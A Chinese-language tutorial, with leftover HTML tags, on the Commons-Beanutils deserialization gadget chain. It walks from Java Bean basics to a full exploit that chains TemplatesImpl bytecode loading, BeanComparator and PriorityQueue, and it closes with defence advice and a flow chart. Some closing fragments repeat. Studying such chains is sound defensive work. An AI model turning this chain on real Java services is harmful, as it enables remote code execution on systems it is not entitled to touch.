Commons-Beanutils反序列化链分析<\/h1>

1. Java Bean基础<\/h2>
Java Bean是一种Java类的书写规范，满足以下条件：<\/p>
成员变量均使用private关键字进行修饰<\/li>
提供构造方法(有参\/无参)<\/li>
为每个成员变量提供set\/get方法<\/li> <\/ol>
示例：<\/p>
public<\/span> class<\/span> Student<\/span> {<\/span>
<\/span><\/span>    private<\/span> String name;<\/span>
<\/span><\/span>    private<\/span> int<\/span> sid;<\/span>
<\/span><\/span>    private<\/span> int<\/span> age;<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> Student<\/span>(<\/span>String name,<\/span> int<\/span> sid,<\/span> int<\/span> age)<\/span> {<\/span>
<\/span><\/span>        this<\/span>.<\/span>name<\/span> =<\/span> name;<\/span>
<\/span><\/span>        this<\/span>.<\/span>sid<\/span> =<\/span> sid;<\/span>
<\/span><\/span>        this<\/span>.<\/span>age<\/span> =<\/span> age;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> Student<\/span>()<\/span> {}<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ setter\/getter方法
<\/span><\/span><\/span><\/span>    public<\/span> void<\/span> setName<\/span>(<\/span>String name)<\/span> {<\/span> this<\/span>.<\/span>name<\/span> =<\/span> name;<\/span> }<\/span>
<\/span><\/span>    public<\/span> void<\/span> setSid<\/span>(<\/span>int<\/span> sid)<\/span> {<\/span> this<\/span>.<\/span>sid<\/span> =<\/span> sid;<\/span> }<\/span>
<\/span><\/span>    public<\/span> void<\/span> setAge<\/span>(<\/span>int<\/span> age)<\/span> {<\/span> this<\/span>.<\/span>age<\/span> =<\/span> age;<\/span> }<\/span>
<\/span><\/span>    public<\/span> String getName<\/span>()<\/span> {<\/span> return<\/span> name;<\/span> }<\/span>
<\/span><\/span>    public<\/span> int<\/span> getSid<\/span>()<\/span> {<\/span> return<\/span> sid;<\/span> }<\/span>
<\/span><\/span>    public<\/span> int<\/span> getAge<\/span>()<\/span> {<\/span> return<\/span> age;<\/span> }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. Commons-Beanutils核心功能<\/h2>
Commons-Beanutils提供了对Java Bean的操作工具，核心功能是通过反射动态调用getter\/setter方法。<\/p>
关键方法：<\/p>
PropertyUtils.<\/span>getProperty<\/span>(<\/span>student,<\/span> "name"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>调用流程：<\/p>

调用getNestedProperty<\/code><\/li>
进入getSimpleProperty<\/code><\/li>
调用getPropertyDescriptor<\/code>获取属性描述符<\/li>
通过反射调用对应getter方法<\/li>
<\/ol>
3. 反序列化链分析<\/h2>
3.1 利用点：TemplatesImpl<\/h3>
利用TemplatesImpl<\/code>类的getOutputProperties()<\/code>方法执行任意代码：<\/p>
TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>\/\/ 通过反射设置恶意字节码
<\/span><\/span><\/span><\/span>Field bytecodesField =<\/span> templates.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_bytecodes"<\/span>);<\/span>
<\/span><\/span>bytecodesField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>byte<\/span>[]<\/span> code =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"Test.class"<\/span>));<\/span>
<\/span><\/span>byte<\/span>[][]<\/span> codes =<\/span> {<\/span>code};<\/span>
<\/span><\/span>bytecodesField.<\/span>set<\/span>(<\/span>templates,<\/span> codes);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 设置必要字段
<\/span><\/span><\/span><\/span>Field nameField =<\/span> templates.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_name"<\/span>);<\/span>
<\/span><\/span>nameField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>nameField.<\/span>set<\/span>(<\/span>templates,<\/span> "test"<\/span>);<\/span>
<\/span><\/span>Field facField =<\/span> templates.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_tfactory"<\/span>);<\/span>
<\/span><\/span>facField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>facField.<\/span>set<\/span>(<\/span>templates,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 触发
<\/span><\/span><\/span><\/span>PropertyUtils.<\/span>getProperty<\/span>(<\/span>templates,<\/span> "outputProperties"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>3.2 反序列化入口：BeanComparator<\/h3>
在commons-beanutils<\/code>中，BeanComparator.compare()<\/code>方法会调用PropertyUtils.getProperty()<\/code>：<\/p>
public<\/span> int<\/span> compare<\/span>(<\/span>Object o1,<\/span> Object o2)<\/span> {<\/span>
<\/span><\/span>    Object value1 =<\/span> PropertyUtils.<\/span>getProperty<\/span>(<\/span>o1,<\/span> property);<\/span>
<\/span><\/span>    Object value2 =<\/span> PropertyUtils.<\/span>getProperty<\/span>(<\/span>o2,<\/span> property);<\/span>
<\/span><\/span>    return<\/span> internalCompare(<\/span>value1,<\/span> value2);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.3 完整利用链<\/h3>
结合CC链的PriorityQueue<\/code>：<\/p>

创建恶意TemplatesImpl<\/code>对象<\/li>
创建BeanComparator<\/code>并设置比较属性为"outputProperties"<\/li>
创建PriorityQueue<\/code>并设置比较器为BeanComparator<\/code><\/li>
将TemplatesImpl<\/code>对象加入队列<\/li>
序列化\/反序列化触发<\/li>
<\/ol>
完整EXP：<\/p>
\/\/ 创建恶意TemplatesImpl
<\/span><\/span><\/span><\/span>TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>Class tc =<\/span> templates.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>Field bytecodesField =<\/span> tc.<\/span>getDeclaredField<\/span>(<\/span>"_bytecodes"<\/span>);<\/span>
<\/span><\/span>bytecodesField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>byte<\/span>[]<\/span> code =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"Test.class"<\/span>));<\/span>
<\/span><\/span>byte<\/span>[][]<\/span> codes =<\/span> {<\/span>code};<\/span>
<\/span><\/span>bytecodesField.<\/span>set<\/span>(<\/span>templates,<\/span> codes);<\/span>
<\/span><\/span>
<\/span><\/span>Field nameField =<\/span> tc.<\/span>getDeclaredField<\/span>(<\/span>"_name"<\/span>);<\/span>
<\/span><\/span>nameField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>nameField.<\/span>set<\/span>(<\/span>templates,<\/span> "test"<\/span>);<\/span>
<\/span><\/span>Field facField =<\/span> tc.<\/span>getDeclaredField<\/span>(<\/span>"_tfactory"<\/span>);<\/span>
<\/span><\/span>facField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>facField.<\/span>set<\/span>(<\/span>templates,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建比较器
<\/span><\/span><\/span><\/span>BeanComparator beanComparator =<\/span> new<\/span> BeanComparator(<\/span>"outputProperties"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建PriorityQueue
<\/span><\/span><\/span><\/span>PriorityQueue priorityQueue =<\/span> new<\/span> PriorityQueue(<\/span>2<\/span>,<\/span> beanComparator);<\/span>
<\/span><\/span>priorityQueue.<\/span>add<\/span>(<\/span>templates);<\/span>
<\/span><\/span>priorityQueue.<\/span>add<\/span>(<\/span>1<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化触发
<\/span><\/span><\/span><\/span>serialize(<\/span>priorityQueue);<\/span>
<\/span><\/span><\/code><\/pre>4. 关键点总结<\/h2>

Java Bean规范<\/strong>：必须符合规范的类才能被Commons-Beanutils操作<\/li>
PropertyUtils.getProperty<\/strong>：通过反射调用getter方法的核心<\/li>
TemplatesImpl利用<\/strong>：通过getOutputProperties()<\/code>触发字节码加载<\/li>
BeanComparator.compare<\/strong>：反序列化入口点<\/li>
PriorityQueue触发<\/strong>：通过反序列化队列触发比较操作<\/li>
<\/ol>
5. 防御措施<\/h2>

升级Commons-Beanutils到最新版本<\/li>
使用安全防护产品检测\/拦截恶意序列化数据<\/li>
对反序列化操作进行严格管控<\/li>
使用白名单机制限制可反序列化的类<\/li>
<\/ol>
6. 流程图<\/h2>
反序列化PriorityQueue
    ↓
触发compare()方法
    ↓
BeanComparator.compare()
    ↓
PropertyUtils.getProperty()
    ↓
调用TemplatesImpl.getOutputProperties()
    ↓
加载并执行恶意字节码
<\/code><\/pre>
Commons-Beanutils反序列化链分析<\/h1>

3. 反序列化链分析<\/h2>

6. 流程图<\/h2> 反序列化PriorityQueue ↓ 触发compare()方法 ↓ BeanComparator.compare() ↓ PropertyUtils.getProperty() ↓ 调用TemplatesImpl.getOutputProperties() ↓ 加载并执行恶意字节码 <\/code><\/pre>

6. 流程图<\/h2>
`反序列化PriorityQueue ↓ 触发compare()方法 ↓ BeanComparator.compare() ↓ PropertyUtils.getProperty() ↓ 调用TemplatesImpl.getOutputProperties() ↓ 加载并执行恶意字节码 <\/code><\/pre>`
